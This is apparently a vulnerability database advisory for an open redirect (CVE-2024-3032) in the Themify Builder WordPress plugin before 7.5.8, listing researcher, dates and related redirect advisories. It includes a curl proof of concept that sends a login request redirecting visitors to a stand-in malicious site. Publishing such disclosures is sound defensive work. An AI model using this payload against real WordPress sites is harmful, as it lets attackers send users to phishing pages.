Themify Builder < 7.5.8 – Open Redirect | CVE 2024-3032 | Plugin Vulnerabilities

Description

The plugin does not validate a parameter before redirecting the user to its value, leading to an Open Redirect issue

Proof of Concept

curl -kvL https://www.example.com/wp-login.php \
     -e http://arbitrary-referer \
     -d "log=invalid_username&pwd=invalid_password&tb_login=1&tb_redirect_fail=https://malicious-site.com"


- `https://www.example.com` should be replaced with the affected WordPress site URL.
- The request triggers a 302 redirect to the URL specified in `tb_redirect_fail`.

Affects Plugins

themify-builder

Fixed in 7.5.8

References

CVE

Classification

Type

REDIRECT

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Valentin LOBSTEIN

Submitter

Valentin LOBSTEIN

Submitter website

https://chocapikk.com

Submitter twitter

Verified

Yes

WPVDB ID

d130a60c-c36b-4994-9b0e-e52cd7f99387

Timeline

Publicly Published

2024-05-23 (about 1 year ago)

Added

2024-05-23 (about 1 year ago)

Last Updated

2024-05-23 (about 1 year ago)

Other

Published

Title

Published

2025-09-26

Title

WP Gravity Forms HubSpot < 1.2.6 - Open Redirect

Published

2018-04-03

Title

WordPress 3.7-4.9.4 - Use Safe Redirect for Login

Published

2024-04-05

Title

OAuth Server < 4.4.0 - Open Redirect

Published

2021-06-01

Title

MC4WP: Mailchimp for WordPress < 4.8.5 - Authenticated Arbitrary Redirect

Published

2023-02-27

Title

WP Meta SEO < 4.5.3 - Subscriber+ Improper Authorization causing Arbitrary Redirect